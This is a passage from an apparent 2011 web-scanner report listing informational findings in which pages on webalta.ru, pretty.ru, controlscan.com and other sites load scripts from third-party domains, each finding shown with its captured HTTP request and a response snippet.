<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js"></script>
...[SNIP]...

23.24. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/public/css/style-weather.css?v1">
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...

23.25. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/07_purple/v1/v1.css" rel="stylesheet" type="text/css">

<script src="http://css.loveplanet.ru/3/img/07_purple/main.js" type="text/javascript"></script>
<script src="http://css.loveplanet.ru/3/img/07_purple/v1/v1.js" type="text/javascript"></script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/fw_slideshow2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/popup2d.js"></script>
...[SNIP]...
<td class="bann_2"><script src="http://fotocash.ru/static/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...

23.26. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:59:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 677005915:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54139


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...

23.27. http://solutions.kronos.com/forms/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /forms/experience2011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forms/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 14:59:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Last-Modfied: Mon, 25 Apr 2011 10:54:53 GMT
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:53 GMT
Content-Length: 52775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<!-- jquery framework -->
<script type="text/javascript" language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<!--elqImg-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqImg.js"></script>
<!--elqCfg-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCfg.js"></script>
...[SNIP]...
<!--astadia-gated-forms-->
<script type="text/javascript" language="Javascript" src="http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js"></script>
...[SNIP]...
<!--elqCpers-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...
<!--elqCpers-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...

23.28. https://store.manageengine.com/service-desk/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /service-desk/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /service-desk/index.html HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:05 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 11:59:05 GMT
ETag: "4d5be12-745c-4a16c77c85440"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:14:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29788

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine ServiceDesk Plus tore</title>
<!-
...[SNIP]...
<link href="https://www.manageengine.com/products/service-desk/style/store-style.css" rel="stylesheet" type="text/css" />
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...

23.29. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
<!-- begin of Top100 code -->
<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2378577"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
   <script src="http://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...

23.30. http://webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:19:59 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:03:11 GMT
ETag: "34d88a0-75ce-4db57f1f"
Accept-Ranges: bytes
Content-Length: 30158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...

23.31. http://webalta.ru/news.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /news.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news.html HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:06 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "34d8a3b-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...

23.32. https://www.controlscan.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180386997.730761609.1303732833.1303732833.1303732833.1; __utmc=180386997; fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.33. https://www.controlscan.com/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php?itemsadded=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.34. https://www.controlscan.com/checkout_invalid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout_invalid.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:56:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.35. https://www.controlscan.com/pcicompliance.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /pcicompliance.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pcicompliance.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.1.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
